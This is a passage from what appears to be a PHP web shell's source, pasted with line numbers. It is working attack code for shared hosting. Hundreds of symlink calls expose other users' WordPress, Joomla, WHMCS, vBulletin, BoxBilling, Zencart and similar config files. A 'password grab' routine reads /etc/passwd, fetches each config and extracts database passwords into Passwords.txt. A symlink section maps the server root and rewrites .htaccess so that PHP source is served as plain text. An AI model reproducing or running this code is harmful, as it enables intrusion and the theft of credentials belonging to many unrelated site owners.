  1937. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1942. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1943. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1944. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1951. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1952. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1953. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1954. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1955. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1956. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1957. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1958. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1959. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1960. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1961. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1962. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1963. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1964. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1965. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1966. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1967. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1968. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1973. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1974. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1975. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1976. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1977. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1978. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1979. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1980. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1981. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1982. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1983.  
  1984. //Home4
  1985.  
  1986. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1987. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1988. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1989. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1990. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1991. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1992. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1993. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1994. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1995. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1996. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1997. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1998. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1999. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2000. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2001. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2002. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2008. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2009. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2010. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2011. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2012. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2013. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2014. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2015. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2016. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2017. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2018. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2019. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2020. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2021. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2023. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2024. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2025. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2026. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2027. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2028. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2029. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2030. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2031. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2032. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2033. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2125. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2126. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2127. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2134. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2135. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2136. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2137. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2138. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2139. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2140. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2141. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2142. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2143. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2144. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2145. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2146. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2147. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2148. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2149. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2150. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2151. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2156. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2157. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2158. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2159. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2160. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2161. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2162. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2163. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2164. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2165. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2166.  
  2167. }
  2168.  
  2169. //password grab
  2170.  
  2171. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2172. {
  2173.  
  2174. $ar0=explode($marqueurDebutLien, $text);
  2175. $ar1=explode($marqueurFinLien, $ar0[1]);
  2176. $ar=trim($ar1[0]);
  2177. return $ar;
  2178. }
  2179.  
  2180. $ffile=fopen('Passwords.txt','a+');
  2181.  
  2182.  
  2183. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/viewsymcnf/";
  2184. $re=$r;
  2185. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2186.  
  2187. $users=file("/etc/passwd");
  2188. foreach($users as $user)
  2189. {
  2190.  
  2191. $str=explode(":",$user);
  2192. $usersss=$str[0];
  2193. foreach($confi as $co)
  2194. {
  2195.  
  2196.  
  2197. $uurl=$re.$usersss.$co;
  2198. $uel=$uurl;
  2199.  
  2200. $ch = curl_init();
  2201.  
  2202. curl_setopt($ch, CURLOPT_URL, $uel);
  2203. curl_setopt($ch, CURLOPT_HEADER, 1);
  2204. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2205. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2206. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2207. $result['EXE'] = curl_exec($ch);
  2208. curl_close($ch);
  2209. $uxl=$result['EXE'];
  2210.  
  2211.  
  2212. if($uxl && preg_match('/table_prefix/i',$uxl))
  2213. {
  2214.  
  2215. //Wordpress
  2216.  
  2217. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2218. if(!empty($dbp))
  2219. $pass=$dbp."\n";
  2220. fwrite($ffile,$pass);
  2221.  
  2222. }
  2223. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2224. {
  2225.  
  2226. //WHMCS
  2227.  
  2228. $dbp=entre2v2($uxl,"db_password = '","';");
  2229. if(!empty($dbp))
  2230. $pass=$dbp."\n";
  2231. fwrite($ffile,$pass);
  2232.  
  2233. }
  2234.  
  2235.  
  2236. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2237. {
  2238.  
  2239. //Joomla
  2240.  
  2241. $db=entre2v2($uxl,"password = '","';");
  2242. if(!empty($db))
  2243. $pass=$db."\n";
  2244. fwrite($ffile,$pass);
  2245. }
  2246. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2247. {
  2248.  
  2249. //Vbulletin
  2250.  
  2251. $db=entre2v2($uxl,"password'] = '","';");
  2252. if(!empty($db))
  2253. $pass=$db."\n";
  2254. fwrite($ffile,$pass);
  2255.  
  2256. }
  2257. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2258. {
  2259.  
  2260. //Other
  2261.  
  2262. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2263. if(!empty($db))
  2264. $pass=$db."\n";
  2265. fwrite($ffile,$pass);
  2266. }
  2267. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2268. {
  2269.  
  2270. //Other
  2271.  
  2272. $db=entre2v2($uxl,"dbpass = '","';");
  2273. if(!empty($db))
  2274. $pass=$db."\n";
  2275. fwrite($ffile,$pass);
  2276. }
  2277. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2278. {
  2279.  
  2280. //Other
  2281.  
  2282. $db=entre2v2($uxl,"dbpass = '","';");
  2283. if(!empty($db))
  2284. $pass=$db."\n";
  2285. fwrite($ffile,$pass);
  2286.  
  2287. }
  2288. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2289. {
  2290.  
  2291. //Other
  2292.  
  2293. $db=entre2v2($uxl,"dbpass = \"","\";");
  2294. if(!empty($db))
  2295. $pass=$db."\n";
  2296. fwrite($ffile,$pass);
  2297. }
  2298.  
  2299.  
  2300. }
  2301. }
  2302. echo "<center>
  2303. <a href=\"viewsymcnf/root/\">Root Server</a>
  2304. <br><a href=\"viewsymcnf/Passwords.txt\">Passwords</a>
  2305. <br><a href=\"viewsymcnf/\">Configurations</a></center>";
  2306. }
  2307. else
  2308. {
  2309. echo "<center>
  2310. <form method=\"POST\">
  2311. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2312. $file = '/etc/passwd';
  2313. $read = @fopen($file, 'r');
  2314. if ($read){
  2315. $body = @fread($read, @filesize($file));
  2316. echo "".htmlentities($body)."";
  2317. }
  2318. elseif(!$read)
  2319. {
  2320. $read = @show_source($file) ;
  2321. }
  2322. elseif(!$read)
  2323. {
  2324. $read = @highlight_file($file);
  2325. }
  2326. elseif(!$read)
  2327. {
  2328. for($uid=0;$uid<1000;$uid++)
  2329. {
  2330. $ara = posix_getpwuid($uid);
  2331. if (!empty($ara))
  2332. {
  2333. while (list ($key, $val) = each($ara))
  2334. {
  2335. print "$val:";
  2336. }
  2337. print "\n";
  2338. }}}
  2339.  
  2340. flush();
  2341.  
  2342. echo "</textarea>
  2343. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2344. </form></center>";
  2345. }
  2346. }
  2347. }
  2348. elseif($_GET['do'] == 'symlink') {
  2349. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2350. $d0mains = @file("/etc/named.conf");
  2351. ##httaces
  2352. if($d0mains){
  2353. @mkdir("viewsm",0777);
  2354. @chdir("viewsm");
  2355. @exe("ln -s / root");
  2356. $file3 = 'Options Indexes FollowSymLinks
  2357. DirectoryIndex janchonx.htm
  2358. AddType text/plain .php
  2359. AddHandler text/plain .php
  2360. Satisfy Any';
  2361. $fp3 = fopen('.htaccess','w');
  2362. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2363. echo "
  2364. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2365. <tr>
  2366. <td align=center><font size=2>S. No.</font></td>
  2367. <td align=center><font size=2>Domains</font></td>
  2368. <td align=center><font size=2>Users</font></td>
  2369. <td align=center><font size=2>Symlink</font></td>
  2370. </tr>";
  2371. $dcount = 1;
  2372. foreach($d0mains as $d0main){
  2373. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2374. flush();
  2375. if(strlen(trim($domains[1][0])) > 2){
  2376. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2377. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2378. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2379. <td>".$user['name']."</td>
  2380. <td><a href='$full/viewsm/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2381. flush();
  2382. $dcount++;}}}
  2383. echo "</table>";
  2384. }else{
  2385. $TEST=@file('/etc/passwd');
  2386. if ($TEST){
  2387. @mkdir("viewsm",0777);
  2388. @chdir("viewsm");
  2389. exe("ln -s / root");
  2390. $file3 = 'Options Indexes FollowSymLinks
  2391. DirectoryIndex janchonx.htm
  2392. AddType text/plain .php
  2393. AddHandler text/plain .php
  2394. Satisfy Any';
  2395. $fp3 = fopen('.htaccess','w');
